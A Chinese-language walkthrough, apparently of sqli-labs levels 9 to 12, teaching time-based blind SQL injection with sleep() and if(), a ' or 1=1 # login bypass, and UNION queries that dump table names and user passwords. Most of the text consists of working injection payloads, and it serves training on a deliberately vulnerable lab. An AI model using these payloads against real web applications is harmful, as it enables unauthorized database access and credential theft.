Less-9

我们先开始判断注入点，闭合方式，数据列数，联合注入这一套下来，发现页面保持不变，大家肯定会想到盲注，上一题是布尔盲注，那这道题会不会是布尔盲注呢？？？布尔盲注适合页面对于错误和正确结果有不同反应，很显然和上一关有区别，所以这一关不适合用布尔盲注，如果页面一直不变这个时候我们可以使用时间盲注。

时间盲注需要用到  sleep（）函数和 if （）函数

if（表达式，sleep（5），1）意思就是表达式若为真，页面等待5s中显示（延迟），若为假，页面直接显示（不延迟）！！！

可以通过页面是否延迟回显，判断表达式是否正确，从而推断出库名，表名，列名！

1.先判断闭合方式，单引号闭合

?id=1' and if(1=1,sleep(5),1)--+

 

会发现页面上面三个点点转了5s后回显页面

2.判断库名长度

?id=1' and if(length(database())=8,sleep(5),1)--+

会发现页面上面三个点点转了5s后回显页面

3.判断库名

//security

?id=1' and if ((ascii(substr(database(),1,1))=115),sleep(5),1)--+   

?id=1' and if ((ascii(substr(database(),1,1))=101),sleep(5),1)--+   

?id=1' and if ((ascii(substr(database(),1,1))=99),sleep(5),1)--+   

?id=1' and if ((ascii(substr(database(),1,1))=117),sleep(5),1)--+   

?id=1' and if ((ascii(substr(database(),1,1))=114),sleep(5),1)--+   

?id=1' and if ((ascii(substr(database(),1,1))=105),sleep(5),1)--+   

?id=1' and if ((ascii(substr(database(),1,1))=116),sleep(5),1)--+  

?id=1' and if ((ascii(substr(database(),1,1))=121),sleep(5),1)--+   

 

4.判断表名

判断表名长度

?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6,sleep(5),1)--+

//emails

?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1)--+

?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=109),sleep(5),1)--+

?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=97),sleep(5),1)--+

?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=105),sleep(5),1)--+

?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=108),sleep(5),1)--+

?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=115),sleep(5),1)--+

5.判断列名

//列名长度

?id=1' and if((select length(column_name) from information_schema.columns where table_name='emails' limit 0,1) = 2 ,sleep(5),1)--+

?id=1' and if((select length(column_name) from information_schema.columns where table_name='emails' limit 1,1) = 8 ,sleep(5),1)--+

//id

?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) =105),sleep(5),1)--+

?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),2,1)) =100),sleep(5),1)--+

//email_id

?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),1,1)) =101),sleep(5),1)--+

?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),2,1)) =109),sleep(5),1)--+

?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),3,1)) =97),sleep(5),1)--+

?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),4,1)) =105),sleep(5),1)--+

?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),5,1)) =108),sleep(5),1)--+

?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),6,1)) =95),sleep(5),1)--+

?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),7,1)) =105),sleep(5),1)--+

?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),8,1)) =100),sleep(5),1)--+

6.获取字段

//获取第一个字段数据长度

?id=1' and if((select length(email_id) from emails limit 0,1) = 16 ,sleep(5),1)--+ 

//Dumb@dhahhan.com

?id=1' and if((ascii(substr((select email_id from emails limit 0,1),1,1)) = 68),sleep(5),1) --+

......

Less-10

第十关和第九关一样只需要将单引号换成双引号。这里不再演示

Less-11

打开后发现，和前10道题有很大的区别，这是一个表单，那应该就是POST 传参题了，遇到这类题不要慌，和一次的做法一样

先判断闭合方式，是单引号

再尝试一下万能密码

’or 1=1 #      这里注意一下，注释符--+不行，那我们用#

or 的意思就是或者，前后有一个为真即可，和and是有区别的（and是前后都为真才执行），所以后面的1=1恒为真，所以是万能密码

将’or 1=1 #填入到 Username中，看看是否能登陆成功

 

登陆成功

接下来就开始判断数据列数，数据库名，表名，列名，字段。。。。

库名

' union select 1,database() #

表名

' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1)#

 

列名

' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users' limit 0,1)#

 

字段数据

' union select (select group_concat(username) from security.users),(select group_concat(password) from security.users) #

 

成功！！！

Less-12

打开发现和11题一样，先判断闭合方式，输入1' 没有回显，输入1",报错回显

发现后面还有个括号，说明闭合方式是   ")

之后就和第11关步骤一样啦

接下来就开始判断数据列数，数据库名，表名，列名，字段。。。。

//库名

") union select 1,database() #

//表名

") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1)#

//列名

")union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users' limit 0,1)#

//字段

")union select (select group_concat(username) from security.users),(select group_concat(password) from security.users) #

成功！！！